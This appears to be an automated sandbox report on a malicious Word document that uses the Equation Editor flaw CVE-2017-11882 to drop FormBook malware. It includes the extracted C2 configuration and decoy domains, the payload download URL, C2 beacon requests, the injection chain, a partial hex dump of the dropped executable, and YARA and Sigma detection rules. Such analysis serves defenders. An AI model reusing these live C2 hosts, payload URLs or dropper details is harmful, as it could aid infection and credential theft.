Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ9003930 New Order.doc

Overview

General Information

Sample Name:RFQ9003930 New Order.doc
Analysis ID:491362
MD5:514ab9ff13f08e764db59c3a79d95771
SHA1:33b2aee2f0e57a080eb6711591e4e38e9324621c
SHA256:286151dbc2feace2a895ff2b71cc0f7e46708aedc8ca16d6a86ba283c5dcdf21
Tags:docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1712 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2580 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hasmenhtk721.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\hasmenhtk721.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
      • hasmenhtk721.exe (PID: 2612 cmdline: C:\Users\user\AppData\Roaming\hasmenhtk721.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 2252 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 2184 cmdline: /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, CommandLine: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, NewProcessName: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: C:\Users\user\AppData\Roaming\hasmenhtk721.exe, ProcessId: 2308
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 2252
      Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 2252

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: RFQ9003930 New Order.docVirustotal: Detection: 28%Perma Link
      Source: RFQ9003930 New Order.docReversingLabs: Detection: 28%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: http://lg-tv.tk/harshmanzx.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: lg-tv.tkVirustotal: Detection: 15%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exeReversingLabs: Detection: 28%
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeReversingLabs: Detection: 28%
      Source: 5.2.hasmenhtk721.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 5.2.hasmenhtk721.exe.516810.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 5.2.hasmenhtk721.exe.30000.0.unpackAvira: Label: TR/ATRAPS.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp
      Source: global trafficDNS query: name: lg-tv.tk
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4x nop then jmp 020B9F29h
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4x nop then jmp 020B9F29h
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

      Networking:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.ceasa.club
      Source: C:\Windows\explorer.exeNetwork Connect: 166.62.10.138 80
      Source: C:\Windows\explorer.exeDomain query: www.eastwestasia-thailand.com
      Source: C:\Windows\explorer.exeDomain query: www.alzayantourism.com
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.eastwestasia-thailand.com/hht8/
      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
      Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
      Source: global trafficHTTP traffic detected: GET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1Host: www.ceasa.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1Host: www.alzayantourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 12:10:55 GMTContent-Type: application/x-msdownloadContent-Length: 860672Last-Modified: Mon, 27 Sep 2021 01:40:53 GMTConnection: keep-aliveETag: "61512125-d2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 16 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 98 01 00 00 00 00 00 d2 a7 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a7 0b 00 4f 00 00 00 00 c0 0b 00 4c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d8 87 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 94 01 00 00 c0 0b 00 00 96 01 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 a7 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 98 53 02 00 03 00 00 00 8c 02 00 06 80 20 04 00 00 87 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02
      Source: global trafficHTTP traffic detected: GET /harshmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:12:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000006.00000000.463735774.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000006.00000000.524424919.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
      Source: explorer.exe, 00000006.00000000.465121306.000000000457A000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%SP&
      Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000006.00000000.526196234.0000000006998000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpP
      Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpp7P&
      Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: hasmenhtk721.exe, hasmenhtk721.exe, 00000005.00000002.477585914.0000000000BB2000.00000020.00020000.sdmp, rundll32.exe, 00000007.00000002.689308196.000000000297F000.00000004.00020000.sdmpString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
      Source: rundll32.exe, 00000007.00000002.687912548.0000000000720000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.456117807.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
